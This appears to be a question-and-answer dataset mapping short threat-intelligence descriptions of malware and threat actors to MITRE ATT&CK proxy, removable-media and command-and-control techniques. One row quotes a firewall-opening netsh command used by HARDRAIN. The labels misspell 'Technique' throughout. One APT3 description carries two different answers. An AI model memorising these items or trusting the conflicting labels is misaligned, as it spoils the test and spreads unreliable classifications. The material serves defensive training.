+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can use proxies for C2 traffic.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HARDRAIN uses the command cmd.exe /c netsh firewall add portopening TCP 443 ""adp"" and makes the victim machine function as a proxy server.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYPLUG has used Cloudflare CDN associated infrastructure to redirect C2 communications to malicious domains.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel can use a proxy during exfiltration if set in the configuration.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LITTLELAMB.WOOLTEA has the ability to function as a SOCKS proxy.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can implement use of proxies to pivot traffic.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to proxy network communications.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains modules that allow for use of proxies in command and control.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can communicate over a reverse proxy using SOCKS5.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use proxy tools including boost_proxy_client for reverse proxy functionality.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai has the ability to proxy connections to specified remote IPs and ports through a a proxy module.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Socksbot can start SOCKS proxy threads.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has the ability to use an embedded SOCKS proxy in C2 communications.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to proxy communications with command and control (C2) servers.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A TYPEFRAME variant can force the compromised system to function as a proxy server.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used a peer-to-peer (P2P) network for C2.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Vasport is capable of tunneling though a proxy.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has the capability to act as a reverse proxy.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XTunnel relays traffic between a C2 server and a victim.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can create a proxy server on compromised hosts.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can set up an HTTP or SOCKS proxy.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can serve as a SOCKS proxy server.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: netsh can be used to set up a proxy tunnel to allow remote host access to an infected host.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ngrok can be used to proxy connections to machines located behind NAT or firewalls.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors proxied traffic through multiple infected systems.","Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used SSH port forwarding capabilities on public-facing systems, and configured at least one instance of Cobalt Strike to use a network pipe over SMB.","Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 used custom tools to create SOCK5 and custom protocol proxies between infected hosts.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized a proxy tool to communicate between compromised assets.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa discovered system proxy settings and used them if available.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has compromised internal network systems to act as a proxy to forward traffic to C2.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used the built-in netsh `port proxy` command to create proxies on compromised systems to facilitate access.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The ""ZJ"" variant of BACKSPACE allows ""ZJ link"" infections with Internet access to relay traffic from ""ZJ listen"" to a command server.","Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK used a proxy server between victims and the C2 server.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.","Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit supports peer connections.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can function as a proxy to create a server that relays communication between the client and C&C server, or between two clients.","Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar has used internal nodes on the compromised network for C2 communications.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can create a named pipe to listen for and send data to a named pipe-based C2 server.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic can leverage a peer-to-peer C2 profile between agents.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can proxy C2 communications including to and from internal agents without internet connectivity.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet installs an RPC server for P2P communications.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Winnti for Windows HTTP/S C2 mode can make use of a local proxy.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can create a named pipe to listen for and send data to a named pipe-based C2 server.,"Tecnique: T1090.001 Proxy: Internal Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server.","Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 uses compromised residential endpoints as proxies for defense evasion and network access.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT3 downloader establishes SOCKS5 connections for its initial C2.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used various tools to proxy C2 communications.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 maintains access to victim environments by using FLIPSIDE to create a proxy for a backup RDP tunnel.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used a modified version of HTRAN to redirect connections between networks.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used multiple proxies to obfuscate network traffic from victims.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\Socks5.","Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has routed their traffic through an external server in order to obfuscate their location.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole InvisiMole can identify proxy servers used by the victim and use them for C2 communication.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.","Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has connected to C2 servers through proxies.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETEXIT can proxy traffic via SOCKS.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has a module that can proxy C2 communications.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Regin leveraged several compromised universities as proxies to obscure its origin.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can use pre-configured HTTP proxies.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Winnti for Windows HTTP/S C2 mode can make use of an external proxy.,"Tecnique: T1090.002 Proxy: External Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors used a layer of proxies to manage C2 communications.","Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors executed commands through the installed web shell via Tor exit nodes.","Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network and has also used TOR.","Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has used Tor to log in to victims' email accounts.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has used Tor for C2 communication.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has used Tor nodes for C2 traffic.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok downloads and installs Tor via homebrew.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy has used Tor relays for Command and Control servers.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer used Tor nodes for C2.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap uses a copy of tor2web proxy for HTTPS communications.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can chain together multiple compromised machines as proxies to reach their final targets.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy uses Tor for command and control.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NGLite has abused NKN infrastructure for its C2 communication.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse has abused the NKN public blockchain protocol for its C2 communications.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has the ability to use a proxy chain with up to 255 hops when using TCP.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape uses Tor to communicate with C2.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Traffic traversing the Tor network will be forwarded to multiple nodes before exiting the Tor network and continuing on to its intended destination.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use implants on multiple compromised machines to proxy communications through its worldwide P2P network.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used Tor for C2.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry uses Tor for command and control traffic.,"Tecnique: T1090.003 Proxy: Multi-hop Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.,"Tecnique: T1090.004 Proxy: Domain Fronting, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike has the ability to accept a value for HTTP Host Header to enable domain fronting.,"Tecnique: T1090.004 Proxy: Domain Fronting, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports domain fronting via custom request headers.,"Tecnique: T1090.004 Proxy: Domain Fronting, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has used a fronted domain to obfuscate its hard-coded C2 server domain.,"Tecnique: T1090.004 Proxy: Domain Fronting, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: meek uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended destination.,"Tecnique: T1090.004 Proxy: Domain Fronting, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.","Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used malicious DLLs to spread malware to connected removable USB drives on infected machines.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used a customized PlugX variant which could spread through USB connections.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has attempted to transfer USBferry from an infected USB device by copying an Autorun function to the target machine.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ANDROMEDA has been spread via infected USB keys.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.","Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker variants used the Windows AUTORUN feature to spread through USB propagation.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can spread across systems by infecting removable media.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky searches for removable media and duplicates itself onto it.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 has functionality to copy itself to removable media.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to use removable drives to spread through compromised networks.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can spread itself by infecting other portable executable files on removable drives.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can copy its installer to attached USB storage devices.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger is capable of spreading to USB devices.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has copied itself to and infected removable drives for propagation.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can be configured to spread via removable drives.,"Tecnique: T1091 Replication Through Removable Media, Tactic: TA0001 Initial Access TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted.,"Tecnique: T1092 Communication Through Removable Media, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.","Tecnique: T1092 Communication Through Removable Media, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.","Tecnique: T1092 Communication Through Removable Media, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team proxied C2 communications within a TLS-based tunnel.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors used TCP for some C2 communications.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used the Unix socket and a reverse TCP shell for C2 communications.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used a custom protocol for command and control.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT3 downloader establishes SOCKS5 connections for its initial C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
